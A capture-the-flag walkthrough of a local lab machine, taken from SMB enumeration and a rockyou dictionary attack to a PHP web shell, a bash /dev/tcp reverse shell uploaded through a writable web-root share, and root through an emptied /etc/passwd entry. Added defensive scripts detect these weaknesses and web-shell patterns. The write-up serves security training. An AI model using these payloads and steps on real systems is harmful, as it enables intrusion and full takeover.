DOMAIN MACHINE
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh domain.tar
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 80 (HTTP), 139 and 445 (SMB) were open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 -sV -sS -vvv 172.17.0.2 2>/dev/null
[sudo] contraseña para kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-27 11:28 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 11:28
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:28, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:28
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 139/tcp on 172.17.0.2
Discovered open port 445/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:28, 0.64s elapsed (65535 total ports)
Initiating Service scan at 11:28
Scanning 3 services on 172.17.0.2
Completed Service scan at 11:28, 11.02s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000030s latency).
Scanned at 2025-12-27 11:28:04 CET for 12s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Next, we run netexec against SMB to identify the host and domain name, as shown below.
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
We also add the host name to /etc/hosts so that our tools can resolve the machine by name.
┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 75FBC149F26E
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Next, we run gobuster to enumerate the web content, but it finds nothing of interest (only the forbidden /server-status).
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x bak,txt,xml,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,bak,txt,xml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 275]
Progress: 1102785 / 1102785 (100.00%)
===============================================================
Finished
===============================================================
We then run enum4linux, which returns a lot of information about the host (users, shares, password policy, etc.) over a null session, as shown below.
┌──(kali㉿kali)-[~]
└─$ sudo enum4linux -a 172.17.0.2
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 27 11:33:24 2025
=========================================( Target Information )=========================================
Target ........... 172.17.0.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on 172.17.0.2 )=============================
[E] Can't find workgroup/domain
=================================( Nbtstat Information for 172.17.0.2 )=================================
Looking up status of 172.17.0.2
No reply from 172.17.0.2
====================================( Session Check on 172.17.0.2 )====================================
[+] Server 172.17.0.2 allows sessions using username '', password ''
=================================( Getting domain SID for 172.17.0.2 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
====================================( OS information on 172.17.0.2 )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for 172.17.0.2 from srvinfo:
2CD1877F9EDF Wk Sv PrQ Unx NT SNT 2cd1877f9edf server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
========================================( Users on 172.17.0.2 )========================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: james Name: james Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: bob Name: bob Desc:
user:[james] rid:[0x3e8]
user:[bob] rid:[0x3e9]
==================================( Share Enumeration on 172.17.0.2 )==================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
html Disk HTML Share
IPC$ IPC IPC Service (2cd1877f9edf server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 172.17.0.2
//172.17.0.2/print$ Mapping: DENIED Listing: N/A Writing: N/A
//172.17.0.2/html Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//172.17.0.2/IPC$ Mapping: N/A Listing: N/A Writing: N/A
=============================( Password Policy Information for 172.17.0.2 )=============================
Password:
[+] Attaching to 172.17.0.2 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] 2CD1877F9EDF
[+] Builtin
[+] Password Info for Domain: 2CD1877F9EDF
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 136 years 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
========================================( Groups on 172.17.0.2 )========================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 172.17.0.2 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-1843279340-185366406-368055819 and logon username '', password ''
S-1-5-21-1843279340-185366406-368055819-501 2CD1877F9EDF\nobody (Local User)
S-1-5-21-1843279340-185366406-368055819-513 2CD1877F9EDF\None (Domain Group)
S-1-5-21-1843279340-185366406-368055819-1000 2CD1877F9EDF\james (Local User)
S-1-5-21-1843279340-185366406-368055819-1001 2CD1877F9EDF\bob (Local User)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\bob (Local User)
S-1-22-1-1001 Unix User\james (Local User)
================================( Getting printer info for 172.17.0.2 )================================
No printers returned.
enum4linux complete on Sat Dec 27 11:34:11 2025
rpcclient with a null session gives us the same information as enum4linux, as shown below.
┌──(kali㉿kali)-[~]
└─$ sudo rpcclient -U "" -N 172.17.0.2
rpcclient $> srvinfo
2CD1877F9EDF Wk Sv PrQ Unx NT SNT 2cd1877f9edf server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
rpcclient $> enumdomusers
user:[james] rid:[0x3e8]
user:[bob] rid:[0x3e9]
rpcclient $>
If we try hydra, we get nothing, because the target does not support SMBv1:
┌──(kali㉿kali)-[~]
└─$ hydra -l "bob" -P /usr/share/wordlists/rockyou.txt smb://172.17.0.2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-27 11:39:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://172.17.0.2:445/
[ERROR] target smb://172.17.0.2:445/ does not support SMBv1
The same happens with the user james:
┌──(kali㉿kali)-[~]
└─$ hydra -l "james" -P /usr/share/wordlists/rockyou.txt smb://172.17.0.2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-27 11:39:40
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://172.17.0.2:445/
[ERROR] target smb://172.17.0.2:445/ does not support SMBv1
Next we try password spraying with netexec, using the username as the password, but with no luck:
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p bob
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [-] 2CD1877F9EDF\bob:bob STATUS_LOGON_FAILURE
We try again with the other user's name as the password, again with no luck:
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p james
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [-] 2CD1877F9EDF\bob:james STATUS_LOGON_FAILURE
Now we run a dictionary attack with rockyou.txt, and this time we succeed:
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 172.17.0.2 445 2CD1877F9EDF [+] 2CD1877F9EDF\bob:star
With the password in hand, we can list the shares, as shown below.
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p star --shares
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [+] 2CD1877F9EDF\bob:star
SMB 172.17.0.2 445 2CD1877F9EDF [*] Enumerated shares
SMB 172.17.0.2 445 2CD1877F9EDF Share Permissions Remark
SMB 172.17.0.2 445 2CD1877F9EDF ----- ----------- ------
SMB 172.17.0.2 445 2CD1877F9EDF print$ READ Printer Drivers
SMB 172.17.0.2 445 2CD1877F9EDF html READ,WRITE HTML Share
SMB 172.17.0.2 445 2CD1877F9EDF IPC$ IPC Service (2cd1877f9edf server (Samba, Ubuntu))
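The enum4linux and netexec output above already contains every weakness that makes the rest of this walkthrough possible: a null session, a five-character minimum with no complexity and no lockout, unsigned SMB, and a share that is writable and backs the web root. The following script is an added example (not part of the original write-up) that parses those two outputs, using constructed fixtures copied from this page, and turns them into findings a defender can act on; the share name html as the web-root share and the 12-character threshold are assumptions of the example.

```python
import re

# Constructed fixture: the relevant lines of the enum4linux output shown on this page.
ENUM4LINUX_OUTPUT = """\
[+] Server 172.17.0.2 allows sessions using username '', password ''
[+] Minimum password length: 5
[+] Password history length: None
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
[+] Locked Account Duration: 30 minutes
"""

# Constructed fixture: the netexec --shares output shown on this page (credential line omitted).
NETEXEC_OUTPUT = """\
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [*] Enumerated shares
SMB 172.17.0.2 445 2CD1877F9EDF Share Permissions Remark
SMB 172.17.0.2 445 2CD1877F9EDF ----- ----------- ------
SMB 172.17.0.2 445 2CD1877F9EDF print$ READ Printer Drivers
SMB 172.17.0.2 445 2CD1877F9EDF html READ,WRITE HTML Share
SMB 172.17.0.2 445 2CD1877F9EDF IPC$ IPC Service (2cd1877f9edf server (Samba, Ubuntu))
"""

# netexec prefixes every line with "SMB <ip> <port> <hostname>"; strip it before parsing.
NXC_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+")
# enum4linux prints policy settings as "[+] Setting name: value".
POLICY_LINE = re.compile(r"^\[\+\]\s+([A-Za-z ]+?):\s*(.+)$")


def parse_password_policy(text):
    """Map '[+] Setting: value' lines from enum4linux to a dict."""
    policy = {}
    for line in text.splitlines():
        m = POLICY_LINE.match(line)
        if m:
            policy[m.group(1).strip()] = m.group(2).strip()
    return policy


def parse_banner(text):
    """Pull the signing/SMBv1 flags out of the netexec banner line."""
    flags = {}
    for key in ("signing", "SMBv1"):
        m = re.search(r"\(%s:(True|False)\)" % key, text)
        if m:
            flags[key] = m.group(1) == "True"
    return flags


def parse_shares(text):
    """Map share name to its permission string ('' when none) from a netexec --shares table."""
    shares, in_table = {}, False
    for line in text.splitlines():
        body = NXC_PREFIX.sub("", line)
        if body.startswith("-----"):   # dashed rule marks the start of the table
            in_table = True
            continue
        if not in_table:
            continue
        tokens = body.split()
        if not tokens:
            continue
        # The second column is permissions only if it is READ / WRITE / READ,WRITE;
        # for IPC$ the remark moves into that position.
        perms = tokens[1] if len(tokens) > 1 and set(tokens[1].split(",")) <= {"READ", "WRITE"} else ""
        shares[tokens[0]] = perms
    return shares


def assess(enum_text, nxc_text, web_root_shares=("html",)):
    """Return (code, explanation) findings for the weaknesses visible in the enumeration output."""
    findings = []
    if "allows sessions using username '', password ''" in enum_text:
        findings.append(("NULL_SESSION", "anonymous SMB sessions allowed: users and shares can be enumerated without credentials"))
    policy = parse_password_policy(enum_text)
    min_len = policy.get("Minimum password length", "")
    if min_len.isdigit() and int(min_len) < 12:   # 12 is the example's assumed threshold
        findings.append(("WEAK_MIN_LENGTH", f"minimum password length is {min_len}"))
    if policy.get("Password Complexity Flags") == "000000":
        findings.append(("NO_COMPLEXITY", "password complexity disabled"))
    if policy.get("Account Lockout Threshold") == "None":
        findings.append(("NO_LOCKOUT", "no lockout threshold: online dictionary attacks are never throttled"))
    if parse_banner(nxc_text).get("signing") is False:
        findings.append(("NO_SIGNING", "SMB signing not required"))
    for share, perms in parse_shares(nxc_text).items():
        if "WRITE" in perms and share in web_root_shares:
            findings.append(("WRITABLE_WEBROOT", f"share {share} is writable and backs the web root: an uploaded .php file runs as the web server user"))
    return findings


if __name__ == "__main__":
    for code, why in assess(ENUM4LINUX_OUTPUT, NETEXEC_OUTPUT):
        print(f"[{code}] {why}")
```

Each finding maps to one Samba or policy setting: null sessions are closed with restrict anonymous / map to guest = Never, the lockout threshold and minimum length are pdbedit policy values, signing is server signing = mandatory, and the html share should simply not be writable by an ordinary user if the web server executes what it contains.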
With bob's credentials we can browse the print$ share with smbclient, as shown below.
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/print$ -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 11 10:05:42 2024
.. D 0 Thu Apr 11 10:05:42 2024
W32ALPHA D 0 Fri Jan 5 22:23:01 2024
color D 0 Thu Apr 11 10:05:42 2024
W32PPC D 0 Fri Jan 5 22:23:01 2024
ARM64 D 0 Thu Apr 11 10:05:42 2024
x64 D 0 Thu Apr 11 10:05:42 2024
W32X86 D 0 Thu Apr 11 10:05:42 2024
COLOR D 0 Fri Jan 5 22:23:01 2024
WIN40 D 0 Fri Jan 5 22:23:01 2024
W32MIPS D 0 Fri Jan 5 22:23:01 2024
IA64 D 0 Fri Jan 5 22:23:01 2024
24253528 blocks of size 1024. 690476 blocks available
smb: \>
IPC$ is not a file share, so listing it returns nothing:
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/IPC$ -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \>
The html share, on the other hand, is readable and writable for bob:
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/html -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 27 11:44:19 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
24253528 blocks of size 1024. 690472 blocks available
smb: \>
Now we create a simple PHP web shell (codigo.php) so that we can execute commands through the web server:
┌──(kali㉿kali)-[~]
└─$ sudo nano codigo.php
<?php system($_GET['cmd']); ?>
We upload it to the html share with the smbclient command put codigo.php, and then call it from the browser:
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/html -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> put codigo.php
putting file codigo.php as \codigo.php (7,8 kB/s) (average 7,8 kB/s)
smb: \> ls
. D 0 Sat Dec 27 11:55:41 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
codigo.php A 32 Sat Dec 27 11:55:41 2025
24253528 blocks of size 1024. 682732 blocks available
smb: \>
http://172.17.0.2/codigo.php?cmd=whoami
Now we create a PHP reverse shell and upload it in the same way:
┌──(kali㉿kali)-[~]
└─$ sudo nano reverse.php
<?php
// connect back to the listener on the Kali host (172.17.0.1, the address nc reports in the session below)
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/443 0>&1'");
?>
We upload reverse.php to the html share with put reverse.php:
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/html -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 27 11:55:41 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
codigo.php A 32 Sat Dec 27 11:55:41 2025
24253528 blocks of size 1024. 675448 blocks available
smb: \> put reverse.php
putting file reverse.php as \reverse.php (24,7 kB/s) (average 24,7 kB/s)
smb: \> ls
. D 0 Sat Dec 27 12:01:10 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
reverse.php A 76 Sat Dec 27 12:01:10 2025
codigo.php A 32 Sat Dec 27 11:55:41 2025
24253528 blocks of size 1024. 675408 blocks available
smb: \>
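Both uploads above (codigo.php and reverse.php) land in the web root through the writable html share, so the file listing of that share is where a defender catches them. The following script is an added example, not part of the original write-up: it scans a web root for PHP files that are not in the deployment baseline or that contain web-shell indicators (an OS-exec call fed from request input, or a shell aimed at a network socket). The baseline set and the sample files are constructed for the demo; the reverse-shell fixture uses the placeholder host LISTENER.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that hand a string to the OS or evaluate code.
DANGEROUS_CALLS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I)
# Request-controlled input feeding such a call is the one-line web-shell signature.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# A shell aimed at a network endpoint is the reverse-shell signature.
NET_SHELL = re.compile(r"/dev/tcp/|\bnc\b.*-e|\bsocat\b", re.I)


def classify_php(source):
    """Return indicator tags for one PHP source text (empty list = nothing suspicious)."""
    tags = []
    if DANGEROUS_CALLS.search(source):
        tags.append("os-exec")
        if REQUEST_INPUT.search(source):
            tags.append("request-controlled")
        if NET_SHELL.search(source):
            tags.append("network-shell")
    return tags


def scan_web_root(root, known_files):
    """Walk a web root and report (relative path, tags) for every file that is
    either not in the deployment baseline or carries a web-shell indicator."""
    root = Path(root)
    results = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        tags = []
        if path.suffix.lower() in (".php", ".phtml", ".phar", ".php5"):
            tags = classify_php(path.read_text(errors="replace"))
        if rel not in known_files:
            tags.append("not-in-baseline")
        if tags:
            results.append((rel, tags))
    return results


def demo():
    """Constructed web root mirroring the html share on this page after the two uploads;
    index.html is the only file in the deployment baseline."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body>Welcome</body></html>\n")
        (root / "codigo.php").write_text("<?php system($_GET['cmd']); ?>\n")
        (root / "reverse.php").write_text(
            "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/LISTENER/443 0>&1'\");\n?>\n")
        return scan_web_root(root, known_files={"index.html"})


if __name__ == "__main__":
    for rel, tags in demo():
        print(f"{rel}: {', '.join(tags)}")
```

The baseline check is the stronger of the two signals: a web root that is deployed from a known manifest should never grow a file nobody deployed, whatever it contains. The structural fix on this machine is the same either way: do not back the web root with a share that ordinary users can write to, and if files must be pushed over SMB, keep the PHP engine off for that directory.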
Then we start a listener on port 443; when we open reverse.php in the browser we get the shell, which we upgrade to a full TTY and start enumerating with, as shown below.
┌──(kali㉿kali)-[~]
└─$ nc -lvp 443
listening on [any] 443 ...
connect to [172.17.0.1] from 75FBC149F26E [172.17.0.2] 47530
bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell
www-data@2cd1877f9edf:/var/www/html$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@2cd1877f9edf:/var/www/html$ ^Z
zsh: suspended nc -lvp 443
┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1] + continued nc -lvp 443
reset xterm
www-data@2cd1877f9edf:/var/www/html$ export TERM=xterm
www-data@2cd1877f9edf:/var/www/html$ export SHELL=bash
www-data@2cd1877f9edf:/var/www/html$ sudo -l
bash: sudo: command not found
www-data@2cd1877f9edf:/var/www/html$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/nano
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@2cd1877f9edf:/var/www/html$
We can see that we have the permissions we need to modify /etc/passwd.
ls -la /usr/bin/passwd
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
www-data@2cd1877f9edf:/var/www/html$ ls -al /etc/passwd
-rw-r--r-- 1 root root 1067 Apr 11 2024 /etc/passwd
www-data@2cd1877f9edf:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
james:x:1001:1001:james,,,:/home/james:/bin/bash
www-data@2cd1877f9edf:/var/www/html$
Having modified the root user's entry in /etc/passwd, we will be able to become root without entering a password.
www-data@2cd1877f9edf:/var/www/html$ cat /etc/passwd
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
james:x:1001:1001:james,,,:/home/james:/bin/bash
www-data@2cd1877f9edf:/var/www/html$
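As a defender-side counterpart to the escalation above, here is an added audit script (not part of the original write-up) that flags the two conditions it relies on: an empty password field in /etc/passwd and a SUID binary outside an assumed baseline. The baseline set and the sample inputs are constructed from the page's own output.

```python
# Added example, not from the original write-up: a defender-side audit of the two
# conditions the walkthrough relies on (an empty root password field in /etc/passwd
# and an unexpected SUID binary). Sample inputs are constructed from the page's output.

# SUID binaries a stock Ubuntu image is expected to carry (assumed baseline; compare
# against your own golden image rather than this list).
EXPECTED_SUID = {
    "/usr/bin/gpasswd", "/usr/bin/umount", "/usr/bin/chfn", "/usr/bin/mount",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

def audit_passwd(lines):
    """Return (kind, detail) findings for passwd entries that permit password-less
    login or give a second account UID 0."""
    findings, uid0 = [], []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed", line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # An empty second field means no password is checked at all: 'su name' just works.
        if pw == "":
            findings.append(("empty-password", name))
        if uid == "0":
            uid0.append(name)
    findings += [("extra-uid0", n) for n in uid0 if n != "root"]
    return findings

def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Return SUID binaries outside the baseline, e.g. an editor that was made SUID root."""
    return sorted({p.strip() for p in paths if p.strip()} - baseline)
# Constructed sample: the tampered /etc/passwd and the SUID list shown in the write-up.
SAMPLE_PASSWD = [
    "root::0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "bob:x:1000:1000:bob,,,:/home/bob:/bin/bash",
]
SAMPLE_SUID = ["/usr/bin/su", "/usr/bin/passwd", "/usr/bin/nano"]

if __name__ == "__main__":
    for kind, detail in audit_passwd(SAMPLE_PASSWD):
        print(f"{kind}: {detail}")
    for path in unexpected_suid(SAMPLE_SUID):
        print(f"unexpected-suid: {path}")
```

On a live host, feed it the output of cat /etc/passwd and find / -perm -4000 instead of the constructed samples.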
Gotcha! We have become root without a password, as you can see below.
www-data@2cd1877f9edf:/var/www/html$ su root
root@2cd1877f9edf:/var/www/html# whoami
root
root@2cd1877f9edf:/var/www/html#
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack